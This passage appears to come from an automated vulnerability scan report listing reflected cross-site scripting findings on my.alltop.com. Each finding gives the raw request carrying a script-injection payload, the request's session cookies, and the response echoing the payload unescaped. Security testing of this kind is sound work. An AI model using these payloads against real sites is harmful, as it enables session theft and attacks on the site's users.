1.252. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%22ns=%22netsparker(0x000202)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b87"><script>alert(1)</script>43171f0d292 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/yf7b87"><script>alert(1)</script>43171f0d292/%22ns=%22netsparker(0x000202) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/yf7b87"><script>alert(1)</script>43171f0d292/%22ns=%22netsparker(0x000202)" method="post" accept-charset="utf-8">
...[SNIP]...

1.253. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%22ns=%22netsparker(0x000202)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 786cf"><script>alert(1)</script>0c02c316324 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y/%22ns786cf"><script>alert(1)</script>0c02c316324=%22netsparker(0x000202) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y/%22ns786cf"><script>alert(1)</script>0c02c316324=%22netsparker(0x000202)" method="post" accept-charset="utf-8">
...[SNIP]...

1.254. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%22ns=%22netsparker(0x000202)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55721"><script>alert(1)</script>6d1d122af64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y/%22ns=%22netsparker(0x000202)?55721"><script>alert(1)</script>6d1d122af64=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y/%22ns=%22netsparker(0x000202)?55721"><script>alert(1)</script>6d1d122af64=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.255. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36af9"><script>alert(1)</script>b59d08d298 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y36af9"><script>alert(1)</script>b59d08d298/%2522ns%253D%2522netsparker%25280x000206%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y36af9"><script>alert(1)</script>b59d08d298/%2522ns%253D%2522netsparker%25280x000206%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.256. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de752"><script>alert(1)</script>136d99151b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)de752"><script>alert(1)</script>136d99151b8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)de752"><script>alert(1)</script>136d99151b8" method="post" accept-charset="utf-8">
...[SNIP]...

1.257. http://my.alltop.com/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d9b"><script>alert(1)</script>515f9448b85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)?80d9b"><script>alert(1)</script>515f9448b85=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y/%2522ns%253D%2522netsparker%25280x000206%2529)?80d9b"><script>alert(1)</script>515f9448b85=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.258. http://my.alltop.com/alpha/z [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/z

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c32"><script>alert(1)</script>60007f3c35e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/z35c32"><script>alert(1)</script>60007f3c35e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:16 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/z35c32"><script>alert(1)</script>60007f3c35e" method="post" accept-charset="utf-8">
...[SNIP]...

1.259. http://my.alltop.com/alpha/z [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/z

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b089b"><script>alert(1)</script>ce6c904454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/z?b089b"><script>alert(1)</script>ce6c904454=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/z?b089b"><script>alert(1)</script>ce6c904454=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.260. http://my.alltop.com/alpha/z [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/z

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db047"><script>alert(1)</script>bab0c53fb7e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/z?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DA)%3C/script%3Edb047"><script>alert(1)</script>bab0c53fb7e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:55 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

